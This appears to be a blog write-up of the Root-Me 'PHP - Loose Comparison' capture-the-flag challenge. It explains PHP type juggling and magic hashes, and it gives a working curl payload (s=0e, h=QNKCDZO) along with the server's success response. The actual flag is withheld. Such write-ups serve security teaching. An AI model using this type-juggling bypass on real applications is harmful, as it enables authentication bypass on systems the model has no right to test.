Posts PHP - Loose Comparison
Post
Cancel

PHP - Loose Comparison

Description

30 Points Link

Another PHP type juggling

Statement

Find a way to get the flag.

No bruteforce needed.


Challenge

In this challenge we are giving a web server with php in the backend and an nginx not vulnerable server with 2 input fields one with a seed and the other is a hash.

php-loose-comp-index.png

We are also giving the source code which is displayed below :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<html>
<body>
 <form action="index.php" class="authform" method="post" accept-charset="utf-8">
        <fieldset>
            <legend>Unbreakable Random</legend>
            <input type="text" id="s" name="s" value="" placeholder="seed" />
            <input type="text" id="h" name="h" value="" placeholder="hash" />
            <input type="submit" name="submit" value="Check" />

        <div class="return-value" style="padding: 10px 0">&nbsp;</div>
        </fieldset>
        </form>
<?php
function gen_secured_random() { // cause random is the way
    $a = rand(1337,2600)*42;
    $b = rand(1879,1955)*42;

    $a < $b ? $a ^= $b ^= $a ^= $b : $a = $b;

    return $a+$b;
}

function secured_hash_function($plain) { // cause md5 is the best hash ever
    $secured_plain = sanitize_user_input($plain);
    return md5($secured_plain);
}

function sanitize_user_input($input) { // cause someone told me to never trust user input
    $re = '/[^a-zA-Z0-9]/';
    $secured_input = preg_replace($re, "", $input);
    return $secured_input;
}

if (isset($_GET['source'])) {
    show_source(__FILE__);
    die();
}


require_once "secret.php";

if (isset($_POST['s']) && isset($_POST['h'])) {
    $s = sanitize_user_input($_POST['s']);
    $h = secured_hash_function($_POST['h']);
    $r = gen_secured_random();
    if($s != false && $h != false) {
        if($s.$r == $h) {
            print "Well done! Here is your flag: ".$flag;
        }
        else {
            print "Fail...";
        }
    }
    else {
        print "<p>Hum ...</p>";
    }
}
?>
<p><em><a href="index.php?source">source code</a></em></p>
</body>
</html>

First thing i noticed was the loose comparison on line 46 and line 47.

1
2
    if($s != false && $h != false) {
        if($s.$r == $h) {

and as the challenge describe, this is our entry point.


Understanding the code

Let’s take a look at what this code does.

First let’s check the functions provided with the source code.

First Function

1
2
3
4
5
6
7
8
function gen_secured_random() { // cause random is the way
    $a = rand(1337,2600)*42;
    $b = rand(1879,1955)*42;

    $a < $b ? $a ^= $b ^= $a ^= $b : $a = $b;

    return $a+$b;
}

What this function does is generate 2 random $a and $b and then check if $a is greater than $b.

If so it XOR with the following statement $a ^= $b ^= $a ^= $b, If not it stores $b in $a and the return the result of $a+$b.

The result this function generate is always a positive integer, This will be helpfull soon.

Second Function

1
2
3
4
5
function sanitize_user_input($input) { // cause someone told me to never trust user input
    $re = '/[^a-zA-Z0-9]/';
    $secured_input = preg_replace($re, "", $input);
    return $secured_input;
}

This function as it’s name state sanitizes user input.

It replaces everything with isn’t alphanumeric with blank and returns the new string as the result.

Third Function

1
2
3
4
function secured_hash_function($plain) { // cause md5 is the best hash ever
    $secured_plain = sanitize_user_input($plain);
    return md5($secured_plain);
}

What this function does is first call the sanitize_user_input function stores the result in $secured_plain and then returns the md5($secured_plain) value as a string.


Exploitation

We should first understand how php loose comparison works, Here is a link for you PHPMagicTricks-TypeJuggling.pdf.

We should also note that we will be using PHP magic Hashes, the reason for that is that PHP evaluate strings which begins with Xe as a power integer where X is an integer.

So for example :

1
2
3
4
$a = 0e1234;
$b = 0e77889;

echo $a == $b;

will be evaluated to TRUE since 0^x is always 0.

Another this we should put in our minds is

1
2
    if($s != false && $h != false) {
        if($s.$r == $h) {

This means we should provide as $s != false which means $s can’t be 0.

a simple bypass for this is using 0e which will be != 0 and evaluate $s != false to TRUE.

And sinse $r will always evalualte to a positive integer the result of $s.$r will be something like 0e512576 == 0.

Now all we have to do is provide an alphanumeric string wich the md5 of will evalute to 0.

These strings are called magic strings.

For that i used this Github Repo.


Payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ curl http://challenge01.root-me.org/web-serveur/ch55/index.php -d "s=0e&h=QNKCDZO&submit=Check"

<html>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
 <form action="index.php" class="authform" method="post" accept-charset="utf-8">
        <fieldset>
            <legend>Unbreakable Random</legend>
            <input type="text" id="s" name="s" value="" placeholder="seed" />
            <input type="text" id="h" name="h" value="" placeholder="hash" />
            <input type="submit" name="submit" value="Check" />

        <div class="return-value" style="padding: 10px 0">&nbsp;</div>
        </fieldset>
        </form>

Well done! Here is your flag: **FLAG**<p><em><a href="index.php?source">source code</a></em></p>
</body>
</html>

Flag

1
$ Flag = Go_Get_It_Your_Self -_- .



If you have any questions, concerns or something to add, please don’t hesitate to write it down.

Updated Apr 30, 2020 2020-04-30T22:40:30+01:00
This post is licensed under CC BY 4.0